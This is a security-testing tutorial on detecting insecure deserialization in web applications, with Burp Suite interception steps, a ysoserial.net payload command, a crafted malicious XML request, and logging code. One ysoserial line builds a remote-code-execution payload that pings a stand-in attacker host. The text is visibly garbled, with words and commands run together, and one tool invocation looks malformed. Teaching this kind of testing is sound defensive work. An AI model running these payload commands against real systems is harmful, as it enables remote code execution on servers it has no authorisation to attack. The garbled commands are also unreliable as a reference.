Black Box Appraoch
Black Box Testing Examples:
-
Identifying Input Points:
- Example: During your assessment, you identify that the application uses a cookie called
userDatawhich appears to contain serialized data.
Action: Capture and inspect the cookie value. Prepare to test it with modified or malicious serialized data.
- Example: During your assessment, you identify that the application uses a cookie called
-
Sending Malformed Data:
- Example: Using Burp Suite, intercept a request containing the
userDatacookie:
Action: Modify theCookie: userData=<base64 encoded serialized object>userDatavalue to include malformed serialized data and observe the response for errors or crashes.
- Example: Using Burp Suite, intercept a request containing the
-
Using Exploitation Tools:
- Example: Generate a payload using
ysoserial.netfor a .NET application:
Action: Inject this payload into theysoserial.net -g TypeConfuseDelegate -f Json.NetuserDatacookie and send the request. Monitor for successful execution or error messages indicating deserialization.
- Example: Generate a payload using
-
Monitoring Responses:
- Example: You receive a response with an error stack trace indicating a deserialization error:
Action: Use this information to refine your payloads and pinpoint the exact deserialization vulnerability.System.InvalidOperationException: There is an error in XML document
- Example: You receive a response with an error stack trace indicating a deserialization error:
-
Proxy and Intercept:
- Example: Intercept and modify traffic using Burp Suite to insert malicious serialized data:
Action: Send the modified request and observe the application's behavior.POST /someEndpoint HTTP/1.1 Host: vulnerableApp.com Content-Type: application/xml <userData> <ObjectType>ExploitType</ObjectType> <Data>malicious_payload</Data> </userData>
- Example: Intercept and modify traffic using Burp Suite to insert malicious serialized data:
Practical Steps with Examples:
-
Set Up Monitoring:
- White Box: Add logging to the deserialization function:
public T Deserialize<T>(string xml) { try { XmlSerializer serializer = new XmlSerializer(typeof(T)); using (StringReader reader = new StringReader(xml)) { return (T)serializer.Deserialize(reader); } } catch (Exception ex) { Logger.Log("Deserialization error: " + ex.Message); throw; } } - Black Box: Use Burp Suite to capture and analyze HTTP traffic:
GET /someEndpoint HTTP/1.1 Host: vulnerableApp.com Cookie: userData=<captured_base64_encoded_data>
- White Box: Add logging to the deserialization function:
-
Generate and Test Payloads:
- White Box: Modify code to test deserialization with different payloads:
string testXml = "<MyObject><Property>test</Property></MyObject>"; MyObject obj = Deserialize<MyObject>(testXml); - Black Box: Use
ysoserialto generate payloads:ysoserial -o Pickle -p RCE "ping -c 1 attacker.com"
- White Box: Modify code to test deserialization with different payloads:
-
Analyze Error Responses:
- White Box: Review log files for deserialization errors:
Deserialization error: InvalidOperationException: There is an error in XML document - Black Box: Inspect HTTP response for stack traces or error messages:
HTTP/1.1 500 Internal Server Error Content-Type: text/html <html> <body> <h1>Server Error</h1> <p>System.InvalidOperationException: There is an error in XML document</p> </body> </html>
- White Box: Review log files for deserialization errors: